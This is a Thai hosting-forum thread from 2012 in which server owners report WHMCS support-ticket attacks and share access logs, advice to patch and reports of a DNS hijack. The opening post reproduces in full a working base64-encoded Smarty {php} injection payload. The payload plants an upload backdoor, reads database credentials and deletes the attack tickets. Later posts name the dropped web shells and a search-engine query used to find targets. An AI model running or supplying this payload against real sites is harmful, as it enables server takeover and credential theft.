11163
January 22, 2012, 8:17pm
1
จากภาพ ครับ ผมได้ Ticket ข้อความแบบด้านล่าง บ่อยมากครับ
A new support ticket has been opened.
Client: rea
Department: แจ้งปัญหา - Support
Subject: {php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0nKTsNCg0KJGYwcDNuID0gZm9wZW4gKCd0ZW1wbGF0ZXNfYy9pbmRleHgucGhwJywnYScpOw0KDQokd3JpdCAgPSBmd3JpdGUoJGYwcDNuICwgJGMwZGUpOw0KDQppZiAoJHdyaXQpIHsNCiAgICBlY2hvICc8Y2VudGVyPjxiPjxmb250IGNvbG9yPXJlZCA+RG9uZSAuLi4gR28gPT4gZG93bmxvYWRzL2luZGV4eC5waHAgOyknOw0KICAgIGZjbG9zZSgkd3JpdCk7DQp9IGVsc2Ugew0KICAgIGVjaG8gJ0Vycm9yICEhJzsNCn0NCiR0ZXh0PWZpbGVfZ2V0X2NvbnRlbnRzKCJjb25maWd1cmF0aW9uLnBocCIpOw0KJHRleHQ9IHN0cl9yZXBsYWNlKCI8P3BocCIsICIiLCAkdGV4dCk7DQokdGV4dD0gc3RyX3JlcGxhY2UoIjw/IiwgIiIsICR0ZXh0KTsNCiR0ZXh0PSBzdHJfcmVwbGFjZSgiPz4iLCAiIiwgJHRleHQpOw0KZXZhbCgkdGV4dCk7DQokZGI9bXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdXNlcm5hbWUsJGRiX3Bhc3N3b3JkKSBvciBkaWUoIkNhbid0IG9wZW4gY29ubmVjdGlvbiB0byBNeVNRTCIpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYl9uYW1lKSBvciBkaWUoIkNhbid0IHNlbGVjdCBkYXRhYmFzZSIpOw0KJGRlbGV0ZSA9IkRFTEVURSBmcm9tIHRibHRpY2tldHMgV0hFUkUgdGl0bGUgbGlrZSAweDI1N0I3MDY4NzA3RDI1OyI7DQpteXNxbF9xdWVyeSgkZGVsZXRlKTs='));{/php}
Priority: Medium
---
{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0nKTsNCg0KJGYwcDNuID0gZm9wZW4gKCd0ZW1wbGF0ZXNfYy9pbmRleHgucGhwJywnYScpOw0KDQokd3JpdCAgPSBmd3JpdGUoJGYwcDNuICwgJGMwZGUpOw0KDQppZiAoJHdyaXQpIHsNCiAgICBlY2hvICc8Y2VudGVyPjxiPjxmb250IGNvbG9yPXJlZCA+RG9uZSAuLi4gR28gPT4gZG93bmxvYWRzL2luZGV4eC5waHAgOyknOw0KICAgIGZjbG9zZSgkd3JpdCk7DQp9IGVsc2Ugew0KICAgIGVjaG8gJ0Vycm9yICEhJzsNCn0NCiR0ZXh0PWZpbGVfZ2V0X2NvbnRlbnRzKCJjb25maWd1cmF0aW9uLnBocCIpOw0KJHRleHQ9IHN0cl9yZXBsYWNlKCI8P3BocCIsICIiLCAkdGV4dCk7DQokdGV4dD0gc3RyX3JlcGxhY2UoIjw/IiwgIiIsICR0ZXh0KTsNCiR0ZXh0PSBzdHJfcmVwbGFjZSgiPz4iLCAiIiwgJHRleHQpOw0KZXZhbCgkdGV4dCk7DQokZGI9bXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdXNlcm5hbWUsJGRiX3Bhc3N3b3JkKSBvciBkaWUoIkNhbid0IG9wZW4gY29ubmVjdGlvbiB0byBNeVNRTCIpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYl9uYW1lKSBvciBkaWUoIkNhbid0IHNlbGVjdCBkYXRhYmFzZSIpOw0KJGRlbGV0ZSA9IkRFTEVURSBmcm9tIHRibHRpY2tldHMgV0hFUkUgdGl0bGUgbGlrZSAweDI1N0I3MDY4NzA3RDI1OyI7DQpteXNxbF9xdWVyeSgkZGVsZXRlKTs='));{/php}
----------------------------
IP Address: 78.177.228.160
---
You can respond to this ticket by simply replying to this email or through the admin area at the url below.
ถ้าอัพเดตล่าสุด หรือ Patch แล้วก็ไม่น่าห่วงอะไรครับ…แต่ถ้ายังล่ะก็
11163
January 22, 2012, 8:53pm
3
ตอนนี้เอาไฟล์มาให้ดูครับ อยู่ๆ เข้าไปอยู่ที่ template_c ครับ
indexx.php
joomla.php
web.php
[url=“http://www.mediafire.com/?k9sxnslqypfuuwt ”]
11163
January 22, 2012, 9:14pm
4
แย่จังครับ ไล่เปลี่ยน pass ซะ มึนหัวเลย ทั้งป่วย
11163
January 22, 2012, 10:34pm
5
คนแฮ็ก [b][color=#F200FF][b]h4CkeR
เก่งจังนะครับ นับถือ
[/b][/color][/b]
11163
January 22, 2012, 10:57pm
6
ไม่มีคนตอบเลย แต่ผม ลองรันไฟล์ web.php แนะนำให้พี่ๆ เจ้าของโฮส รีบๆ ค้นดูนะครับ
สุดยอดมาก เอาเข้ามาได้ยังไง กัน ไม่เคยเห็นเลยครับ
โดน back door ครับ ผมก็เคยโดน อัพเดรตแล้วไล่เปลี่ยนพาสทั้งหมดเลยคัรบ ลองเข้าไปฟอรั่มดู
อย่าลืมอัพให้เป็นตัวล่าสุด หรือไปโหลด patch มาด้วยละครับ เดี่ยวจะโดนอีก
11163
January 22, 2012, 11:19pm
9
ตอนนี้ เอา log มาให้ดูครับ เคร้าจริง แต่ละไฟล์ที่เ้ค้าเอามามัน manage ได้เลย จบเลย
78.177.228.160 - - [22/Jan/2012:18:11:17 +0700] "GET /submitticket.php?step=2&deptid=2 HTTP/1.1" 200 3187 "http://www.google.com.tr/url?sa=t&rct=j&q=inurl%3Asubmitticket.php%20%E0%B9%81%E0%B8%81&source=web&cd=55&ved=0CD0QFjAEODI&url=http%3A%2F%2Fclient.tzi.net%2Fsubmitticket.php%3Fstep%3D2%26deptid%3D2&ei=9esbT6fCKc6DtQbQg6xH&usg=AFQjCNHH_7n3_jwHc__6M_aHIcmymUKZ0A&cad=rja" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:11:18 +0700] "GET /templates/portal/style.css HTTP/1.1" 200 1810 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:11:19 +0700] "GET /templates/portal/images/icons/support.gif HTTP/1.1" 200 1339 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:11:19 +0700] "GET /images/add.gif HTTP/1.1" 200 864 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:11:19 +0700] "GET /includes/verifyimage.php HTTP/1.1" 200 2122 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:11:19 +0700] "GET /templates/portal/images/icons/star.png HTTP/1.1" 200 711 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:11:20 +0700] "GET /templates/portal/images/icons/clientarea.gif HTTP/1.1" 200 1333 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:11:20 +0700] "GET /templates/portal/images/icons/announcement.gif HTTP/1.1" 200 911 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:11:20 +0700] "GET /templates/portal/images/icons/knowledgebase.gif HTTP/1.1" 200 1312 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:11:20 +0700] "GET /templates/portal/images/icons/submit-ticket.gif HTTP/1.1" 200 1338 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:11:20 +0700] "GET /templates/portal/images/icons/downloads.gif HTTP/1.1" 200 1335 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:11:21 +0700] "GET /templates/portal/images/icons/order.gif HTTP/1.1" 200 1329 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:11:20 +0700] "GET /includes/jscript/jquery.js HTTP/1.1" 200 20091 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:11:23 +0700] "GET /templates/portal/images/bg_background.gif HTTP/1.1" 200 714 "http://client.tzi.net/templates/portal/style.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:11:23 +0700] "GET /templates/portal/images/content_container_bg.gif HTTP/1.1" 200 365 "http://client.tzi.net/templates/portal/style.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:11:24 +0700] "GET /favicon.ico HTTP/1.1" 404 602 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:11:33 +0700] "POST /submitticket.php HTTP/1.1" 200 437 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:11:36 +0700] "POST /submitticket.php?step=3 HTTP/1.1" 302 475 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:11:38 +0700] "GET /submitticket.php?step=4 HTTP/1.1" 200 2262 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:12:04 +0700] "GET //templates_c/indexx.php HTTP/1.1" 200 393 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:12:14 +0700] "POST //templates_c/indexx.php HTTP/1.1" 200 350 "http://client.tzi.net//templates_c/indexx.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:13:28 +0700] "GET //templates_c/joomla.php HTTP/1.1" 200 8910 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
78.177.228.160 - - [22/Jan/2012:18:13:36 +0700] "POST //templates_c/joomla.php HTTP/1.1" 200 6663 "http://client.tzi.net//templates_c/joomla.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
11163
January 22, 2012, 11:24pm
10
http://www.google.com.tr/url?sa=t&rct=j&q=inurl%3Asubmitticket.php%20%E0%B9%81%E0%B8%81&source=web&cd=55&ved=0CD0QFjAEODI&url=http%3A%2F%2Fclient.tzi.net%2Fsubmitticket.php%3Fstep%3D2%26deptid%3D2&ei=9esbT6fCKc6DtQbQg6xH&usg=AFQjCNHH_7n3_jwHc__6M_aHIcmymUKZ0A&cad=rja
จุดเริ่มต้น
ปล. เว็บ tzi.net แค่ยกตัวอย่างมานะครับ
11163
January 23, 2012, 7:03pm
11
มันเข้าไปเปลี่ยน DNS ผมได้แล้ว งง มาก โดเมนจดไว้ที่อื่นไม่ได้รวมกับที่ไหน ไม่ได้พ่วงไว้กับ whmcs ด้วย
โดเมนหลักถูกชี้มาไอพี
173.193.106.10
ขอบคุณที่เค้าไม่ย้ายหนี
แหม่ เช้านี้มีคนมาลองของที่เว็บผมด้วย คิดว่าคงเป็นคนใน THT นี่ล่ะ ข้อความใน Ticket เหมือนตัวอย่างในกระทู้เลย
IP True Internet บ้านใครหรอครับ แสดงตัวหน่อยสิ
SiamLiveHost.com บริการดี ♥ ในราคาเบาๆ:
แหม่ เช้านี้มีคนมาลองของที่เว็บผมด้วย คิดว่าคงเป็นคนใน THT นี่ล่ะ ข้อความใน Ticket เหมือนตัวอย่างในกระทู้เลย
IP True Internet บ้านใครหรอครับ แสดงตัวหน่อยสิ
ผมก็โดนครับ ตอนตีห้า IP True Internet เหมือนกัน อย่ามาลองบ่อยๆนะ รำคาร
ผมก็โดน ip เดียวกันเลยครับ 5555 ไอเราก็งง อุส่าเปิดให้เฉพาะ ip ไทยเท่านั้นที่เข้าได้ มาได้ไง ที่ไหนได้ ip จากไทยนี่เอง
58.11.162.232 - - [24/Jan/2012:04:38:02 +0700] "GET /submitticket.php HTTP/1.1" 200 2483 "http://www.google.co.th/url?sa=t&rct=j&q=inurl:submitticket.php&source=web&cd=54&ved=0CDcQFjADODI&url=http%3A%2F%2Fmydomain.com%2Fsubmitticket.php&ei=39IdT62xI8XorAfU75mSDA&usg=AFQjCNH2dYjjIptHsLobEE5WWXEx4zwU5w&sig2=L7_TGinoljZUPifqUcj6fw" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:38:04 +0700] "GET /templates/default/css/bootstrap.css HTTP/1.1" 200 13727 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:38:04 +0700] "GET /templates/default/css/whmcs.css HTTP/1.1" 200 5486 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:38:04 +0700] "GET /includes/jscript/jquery.js HTTP/1.1" 200 36233 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:38:04 +0700] "GET /templates/default/js/whmcs.js HTTP/1.1" 200 1950 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:38:06 +0700] "GET /images/emails.gif HTTP/1.1" 200 1524 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:38:06 +0700] "GET /templates/default/img/whmcslogo.png HTTP/1.1" 200 21353 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:38:09 +0700] "GET /templates/default/img/fa-icon.png HTTP/1.1" 200 4059 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:38:58 +0700] "GET /submitticket.php?step=2&deptid=2 HTTP/1.1" 200 3230 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:38:58 +0700] "GET /includes/jscript/jquery.js HTTP/1.1" 304 415 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:38:58 +0700] "GET /templates/default/css/bootstrap.css HTTP/1.1" 304 415 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:38:59 +0700] "GET /templates/default/css/whmcs.css HTTP/1.1" 304 415 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:38:59 +0700] "GET /templates/default/js/whmcs.js HTTP/1.1" 304 415 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:39:00 +0700] "GET /templates/default/img/whmcslogo.png HTTP/1.1" 304 383 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:39:00 +0700] "GET /images/add.gif HTTP/1.1" 200 1092 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:39:00 +0700] "GET /includes/verifyimage.php HTTP/1.1" 200 2430 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:39:00 +0700] "GET /templates/default/img/fa-icon.png HTTP/1.1" 200 4260 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:39:30 +0700] "POST /submitticket.php HTTP/1.1" 200 734 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:39:34 +0700] "POST /submitticket.php?step=3 HTTP/1.1" 302 766 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:39:35 +0700] "GET /submitticket.php?step=4 HTTP/1.1" 200 2318 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:39:36 +0700] "GET /templates/default/img/fa-icon.png HTTP/1.1" 200 4260 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.11.162.232 - - [24/Jan/2012:04:39:54 +0700] "GET /viewticket.php?tid=512837&c=u4tvdg7M HTTP/1.1" 200 4510 "https://mydomain.com/submitticket.php?step=4" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
ผมก็โดน ไอพีเดียวกัน ขนาดไม่ค่อยเล่น THT น่ะ กระทู้นี้ก็ยังไม่ได้แสดงความเห็น
IP Address: 58.11.162.232
5:16:52 AM
ตอน 1:24 น. ที่ผ่านมา มาจาก ip 58.9.20.41 อีกแล้วครับ ^^
58.9.20.41 - - [25/Jan/2012:01:24:10 +0700] "GET /cart.php?a=add&pid=75 HTTP/1.1" 200 2712 "http://www.mydomain.com/web-hosting/linux-hosting/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.9.20.41 - - [25/Jan/2012:01:24:10 +0700] "GET /includes/jscript/jquery.js HTTP/1.1" 200 36233 "http://mydomain.com/cart.php?a=add&pid=75" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.9.20.41 - - [25/Jan/2012:01:24:10 +0700] "GET /templates/default/css/bootstrap.css HTTP/1.1" 200 13727 "http://mydomain.com/cart.php?a=add&pid=75" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.9.20.41 - - [25/Jan/2012:01:24:10 +0700] "GET /templates/default/css/whmcs.css HTTP/1.1" 200 5486 "http://mydomain.com/cart.php?a=add&pid=75" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.9.20.41 - - [25/Jan/2012:01:24:10 +0700] "GET /templates/default/js/whmcs.js HTTP/1.1" 200 1950 "http://mydomain.com/cart.php?a=add&pid=75" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.9.20.41 - - [25/Jan/2012:01:24:10 +0700] "GET /templates/orderforms/cart/style.css HTTP/1.1" 200 1278 "http://mydomain.com/cart.php?a=add&pid=75" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.9.20.41 - - [25/Jan/2012:01:24:11 +0700] "GET /templates/default/img/whmcslogo.png HTTP/1.1" 200 21353 "http://mydomain.com/cart.php?a=add&pid=75" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.9.20.41 - - [25/Jan/2012:01:24:14 +0700] "GET /templates/default/img/fa-icon.png HTTP/1.1" 200 4059 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
